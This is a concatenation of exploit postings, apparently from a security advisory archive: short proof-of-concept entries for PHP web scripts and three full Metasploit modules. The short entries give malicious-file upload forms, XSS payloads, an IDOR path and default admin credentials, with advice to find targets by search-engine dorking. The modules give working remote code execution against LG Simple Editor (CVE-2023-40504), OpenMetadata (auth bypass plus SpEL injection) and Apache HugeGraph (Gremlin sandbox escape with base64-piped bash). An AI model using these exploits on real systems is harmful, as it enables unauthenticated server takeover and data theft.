<pre><code>=============================================================================================================================================<br />| # Title : Hotel Booking System 1.0 Remote File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This HTML page is designed to remotely upload malicious PHP files directly.<br /><br />[+] Line 9 set url of target.<br /><br />[+] The path to upload the files : http://127.0.0.1/hotel/uploadImage\Profile<br /><br />[+] Save Code as html :<br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Image Upload Form</title><br /></head><br /><body><br /> <form action="http://127.0.0.1/source%20code/profile.php" method="POST" enctype="multipart/form-data"><br /> <label for="image">Upload an image:</label><br /> <input type="file" id="image" name="image" accept="image/*" required><br /> <button type="submit" name="btn_update">Upload</button><br /> </form><br /></body><br /></html><br /><br />[+] part 2 : infected item ( manage_website.php ) .<br /><br />[+] Line 9 set url of target.<br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Update Website Images</title><br /></head><br /><body><br /> <form action="http://127.0.0.1/source%20code/manage_website.php" method="POST" enctype="multipart/form-data"><br /> <input type="hidden" name="old_website_image" value="current_website_image.jpg"><br /> <label for="website_image">Upload new website image:</label><br /> <input type="file" id="website_image" name="website_image" accept="image/*"><br /> <br /> <input type="hidden" name="old_login_image" value="current_login_image.jpg"><br /> <label for="login_image">Upload new login image:</label><br /> <input type="file" id="login_image" name="login_image" accept="image/*"><br /> <br /> <input type="hidden" name="old_back_login_image" value="current_back_login_image.jpg"><br /> <label for="back_login_image">Upload new back login image:</label><br /> <input type="file" id="back_login_image" name="back_login_image" accept="image/*"><br /> <br /> <button type="submit" name="btn_web">Update Images</button><br /> </form><br /></body><br /></html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Home Owners Collection Management System v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = admin123<br /><br />[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Giftora V 1.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : /search?q=1'%22()%26%25<acx><ScRiPt%20>prompt(966079)</ScRiPt><br /><br />[+] save code as poc.html <br /><br />[+] payload : https://127.0.0.1/giftora.webister.net//search?q=1%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(966079)%3C/ScRiPt%3E<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Bhojon restaurant management system v3.0 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.bdtask.com/restaurant-management-system.php#live_demo |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.<br /><br />[+] use payload : /dashboard/autoupdate<br /><br />[+] https://www/127.0.0.1/gixrestaurantmy/dashboard/autoupdate<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'LG Simple Editor Command Injection (CVE-2023-40504)',<br /> 'Description' => %q{<br /> Unauthenticated Command Injection in LG Simple Editor <= v3.21.0.<br /> The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\SYSTEM.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'rgod', # Vulnerability discovery<br /> 'Michael Heinzl' # MSF module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-1208/'],<br /> [ 'CVE', '2023-40504']<br /> ],<br /> 'DisclosureDate' => '2023-08-04',<br /> 'Platform' => 'win',<br /> 'Arch' => [ ARCH_CMD ],<br /> 'Targets' => [<br /> [<br /> 'Windows_Fetch',<br /> {<br /> 'Arch' => [ ARCH_CMD ],<br /> 'Platform' => 'win',<br /> 'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL' },<br /> 'Type' => :win_fetch,<br /> 'Payload' => {<br /> 'BadChars' => '\\'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /><br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> Opt::RPORT(8080),<br /> OptString.new('TARGETURI', [true, 'The URI of the LG Simple Editor', '/'])<br /> ]<br /> )<br /> end<br /><br /> # Determine if the Simple Editor instance runs a vulnerable version<br /> # copied from lg_simple_editor_rce.rb<br /> def check<br /> res = send_request_cgi(<br /> {<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri, 'simpleeditor', 'common', 'commonReleaseNotes.do')<br /> }<br /> )<br /><br /> return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?<br /><br /> version = Rex::Version.new(res.get_html_document.xpath('//h2')[0]&.text&.gsub('v', ''))<br /> return Exploit::CheckCode::Unknown if version.nil? || version == 'Unknown'<br /> return Exploit::CheckCode::Appears("Version: #{version}") if version <= Rex::Version.new('3.21.0')<br /><br /> Exploit::CheckCode::Safe<br /> end<br /><br /> def exploit<br /> execute_command(payload.encoded)<br /> end<br /><br /> def execute_command(cmd)<br /> print_status('Sending command injection...')<br /> exec_simplerce(cmd)<br /> print_status('Exploit finished, check thy shell.')<br /> end<br /><br /> # Send command injection<br /> def exec_simplerce(cmd)<br /> filename = Rex::Text.rand_text_alpha(1..6)<br /> vprint_status("Using random filename: #{filename}.mp4")<br /> form = Rex::MIME::Message.new<br /> form.add_part('/', nil, nil, "form-data; name=\"uploadVideo\"; filename=\"#{filename}.mp4\"")<br /> form.add_part("/\"&#{cmd}&cd ..&cd ..&cd ..&cd server&cd webapps&cd simpleeditor&del #{filename}.mp4&/../", nil, nil, 'form-data; name="uploadPath"')<br /> form.add_part('1', nil, nil, 'form-data; name="uploadFile_x"')<br /> form.add_part('1', nil, nil, 'form-data; name="uploadFile_width"')<br /> form.add_part('1', nil, nil, 'form-data; name="uploadFile_height"')<br /><br /> res = send_request_cgi(<br /> {<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'simpleeditor', 'imageManager', 'uploadVideo.do'),<br /> 'ctype' => "multipart/form-data; boundary=#{form.bound}",<br /> 'data' => form.to_s<br /> }<br /> )<br /> if res && res.code == 200<br /> print_good 'Command injection sent.'<br /> else<br /> fail_with(Failure::UnexpectedReply, "#{peer}: Unexpected response received.")<br /> end<br /> end<br /><br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'OpenMetadata authentication bypass and SpEL injection exploit chain',<br /> 'Description' => %q{<br /> OpenMetadata is a unified platform for discovery, observability, and governance powered<br /> by a central metadata repository, in-depth lineage, and seamless team collaboration.<br /> This module chains two vulnerabilities that exist in the OpenMetadata aplication.<br /> The first vulnerability, CVE-2024-28255, bypasses the API authentication using JWT tokens.<br /> It misuses the `JwtFilter` that checks the path of the url endpoint against a list of excluded<br /> endpoints that does not require authentication. Unfortunately, an attacker may use Path Parameters<br /> to make any path contain any arbitrary strings that will match the excluded endpoint condition<br /> and therefore will be processed with no JWT validation allowing an attacker to bypass the<br /> authentication mechanism and reach any arbitrary endpoint.<br /> By chaining this vulnerability with CVE-2024-28254, that allows for arbitrary SpEL injection<br /> at endpoint `/api/v1/events/subscriptions/validation/condition/<expression>`, attackers<br /> are able to run arbitrary commands using Java classes such as `java.lang.Runtime` without any<br /> authentication.<br /> OpenMetadata versions `1.2.3` and below are vulnerable.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Msf module contributor<br /> 'Alvaro Muñoz alias pwntester (https://github.com/pwntester)' # Original discovery<br /> ],<br /> 'References' => [<br /> ['CVE', '2024-28255'],<br /> ['CVE', '2024-28254'],<br /> ['URL', 'https://securitylab.github.com/advisories/GHSL-2023-235_GHSL-2023-237_Open_Metadata/'],<br /> ['URL', 'https://attackerkb.com/topics/f19fXpZn62/cve-2024-28255'],<br /> ['URL', 'https://ethicalhacking.uk/unmasking-cve-2024-28255-authentication-bypass-in-openmetadata/']<br /> ],<br /> 'DisclosureDate' => '2024-03-15',<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Automatic',<br /> {<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => ARCH_CMD<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'rport' => 8585,<br /> 'FETCH_COMMAND' => 'WGET'<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> OptString.new('TARGETURI', [true, 'The URI path of the OpenMetadata web application', '/'])<br /> ]<br /> )<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> # list of paths that require no authentication<br /> unauthed_paths = [<br /> '/api/v1;v1%2Fv1%2Fusers%2Flogin',<br /> '/api/v1;v1%2Fv1%2Fusers%2Fsignup',<br /> '/api/v1;v1%2Fv1%2Fusers%2FregistrationConfirmation',<br /> '/api/v1;v1%2Fv1%2Fusers%2FresendRegistrationToken',<br /> '/api/v1;v1%2Fv1%2Fusers%2FgeneratePasswordResetLink',<br /> '/api/v1;v1%2Fv1%2Fusers%2Fpassword%2Freset',<br /> '/api/v1;v1%2Fv1%2Fusers%2FcheckEmailInUse',<br /> '/api/v1;v1%2Fv1%2Fusers%2Frefresh',<br /> '/api/v1;v1%2Fv1%2Fsystem%2Fconfig',<br /> '/api/v1;v1%2Fv1%2Fsystem%2Fversion'<br /> ]<br /> # $@|sh – Getting a shell environment from Runtime.exec<br /> cmd = "sh -c $@|sh . echo #{cmd}"<br /> cmd_b64 = Base64.strict_encode64(cmd)<br /> spel_payload = "T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(\"#{cmd_b64}\")))"<br /> unauthed_paths.shuffle!.each do |path|<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, path, 'events', 'subscriptions', 'validation', 'condition', spel_payload),<br /> 'method' => 'GET'<br /> })<br /> break if res.code == 400 && res.body.include?('EL1001E')<br /> end<br /> end<br /><br /> def check<br /> print_status('Trying to detect if target is running a vulnerable version of OpenMetadata.')<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path),<br /> 'method' => 'GET'<br /> })<br /> return CheckCode::Unknown('Could not detect OpenMetadata.') unless res && res.code == 200 && res.body.include?('OpenMetadata')<br /><br /> # try to dectect version<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'system', 'version'),<br /> 'method' => 'GET'<br /> })<br /> return CheckCode::Detected('Could not retrieve the version information.') unless res && res.code == 200<br /><br /> # parse json response and get the version<br /> res_json = res.get_json_document<br /> unless res_json.blank?<br /> version = res_json['version']<br /> version_number = Rex::Version.new(version.gsub(/[[:space:]]/, '')) unless version.nil?<br /> end<br /> return CheckCode::Detected('Could not retrieve the version information.') if version_number.nil?<br /> return CheckCode::Appears("Version #{version_number}") if version_number <= Rex::Version.new('1.2.3')<br /><br /> CheckCode::Safe("Version #{version_number}")<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> execute_command(payload.encoded)<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Apache HugeGraph Gremlin RCE',<br /> 'Description' => %q{<br /> This module exploits CVE-2024-27348 which is a Remote Code Execution (RCE) vulnerability that exists in<br /> Apache HugeGraph Server in versions before 1.3.0. An attacker can bypass the sandbox restrictions and achieve<br /> RCE through Gremlin, resulting in complete control over the server<br /> },<br /> 'Author' => [<br /> '6right', # discovery<br /> 'jheysel-r7' # module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://blog.securelayer7.net/remote-code-execution-in-apache-hugegraph/'],<br /> [ 'CVE', '2024-27348']<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => %w[unix linux],<br /> 'Privileged' => true,<br /> 'Arch' => [ ARCH_CMD ],<br /> 'Targets' => [<br /> [ 'Automatic Target', {}]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2024-04-22',<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE, ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, ],<br /> 'Reliability' => [ REPEATABLE_SESSION, ]<br /> }<br /> )<br /> )<br /> register_options([<br /> Opt::RPORT(8080),<br /> OptString.new('TARGETURI', [true, 'Base path to the Apache HugeGraph web application', '/'])<br /> ])<br /> end<br /><br /> def check<br /> res = send_request_cgi({<br /> 'method' => 'GET'<br /> })<br /><br /> return CheckCode::Unknown('No response from the vulnerable endpoint /gremlin') unless res<br /> return CheckCode::Unknown("The response from the vulnerable endpoint /gremlin was: #{res.code} (expected: 200)") unless res.code == 200<br /><br /> version = res.get_json_document&.dig('version')<br /> return CheckCode::Unknown('Unable able to determine the version of Apache HugeGraph') unless version<br /><br /> if Rex::Version.new(version).between?(Rex::Version.new('1.0.0'), Rex::Version.new('1.3.0'))<br /> return CheckCode::Appears("Apache HugeGraph version detected: #{version}")<br /> end<br /><br /> CheckCode::Safe("Apache HugeGraph version detected: #{version}")<br /> end<br /><br /> def exploit<br /> print_status("#{peer} - Running exploit with payload: #{datastore['PAYLOAD']}")<br /><br /> class_name = rand_text_alpha(4..12)<br /> thread_name = rand_text_alpha(4..12)<br /> command_name = rand_text_alpha(4..12)<br /> process_builder_name = rand_text_alpha(4..12)<br /> start_method_name = rand_text_alpha(4..12)<br /> constructor_name = rand_text_alpha(4..12)<br /> field_name = rand_text_alpha(4..12)<br /><br /> java_payload = <<~PAYLOAD<br /> Thread #{thread_name} = Thread.currentThread();<br /> Class #{class_name} = Class.forName(\"java.lang.Thread\");<br /> java.lang.reflect.Field #{field_name} = #{class_name}.getDeclaredField(\"name\");<br /> #{field_name}.setAccessible(true);<br /> #{field_name}.set(#{thread_name}, \"#{thread_name}\");<br /> Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");<br /> java.lang.reflect.Constructor #{constructor_name} = processBuilderClass.getConstructor(java.util.List.class);<br /> java.util.List #{command_name} = java.util.Arrays.asList(#{"bash -c {echo,#{Rex::Text.encode_base64(payload.encoded)}}|{base64,-d}|bash".strip.split(' ').map { |element| "\"#{element}\"" }.join(', ')});<br /> Object #{process_builder_name} = #{constructor_name}.newInstance(#{command_name});<br /> java.lang.reflect.Method #{start_method_name} = processBuilderClass.getMethod(\"start\");<br /> #{start_method_name}.invoke(#{process_builder_name});<br /> PAYLOAD<br /><br /> data = {<br /> 'gremlin' => java_payload,<br /> 'bindings' => {},<br /> 'language' => 'gremlin-groovy',<br /> 'aliases' => {}<br /> }<br /><br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, '/gremlin'),<br /> 'method' => 'POST',<br /> 'ctype' => 'application/json',<br /> 'data' => data.to_json<br /> })<br /><br /> print_error('Unexpected response from the vulnerable exploit') unless res && res.code == 200<br /> end<br />end<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Feberr v13.4 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.codester.com/items/14224/feberr-multivendor-digital-products-marketplace |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user&pass: admin<br /><br />[+] https://www/127.0.0.1/nexuscriptscom/admin/pwa-settings<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Farmacia Gama v1.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://download-media.code-projects.org/2020/04/Farmacia_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : /main.php?notaFiscal=333962'"()%26%25<acx><ScRiPt >prompt(926815)</ScRiPt>&pg=vendas<br /><br />[+] http://127.0.0.1/farmacia-master/main.php?notaFiscal=333962'"()%26%25<acx><ScRiPt >prompt(926815)</ScRiPt>&pg=vendas<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Ecommerce 1.15 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://demo.phpscriptpoint.com/ecommerce |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin@gmail.com & pass = 1234<br /><br />[+] https://www/127.0.0.1/demo/phpscriptpoint.com/ecommerce/admin<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>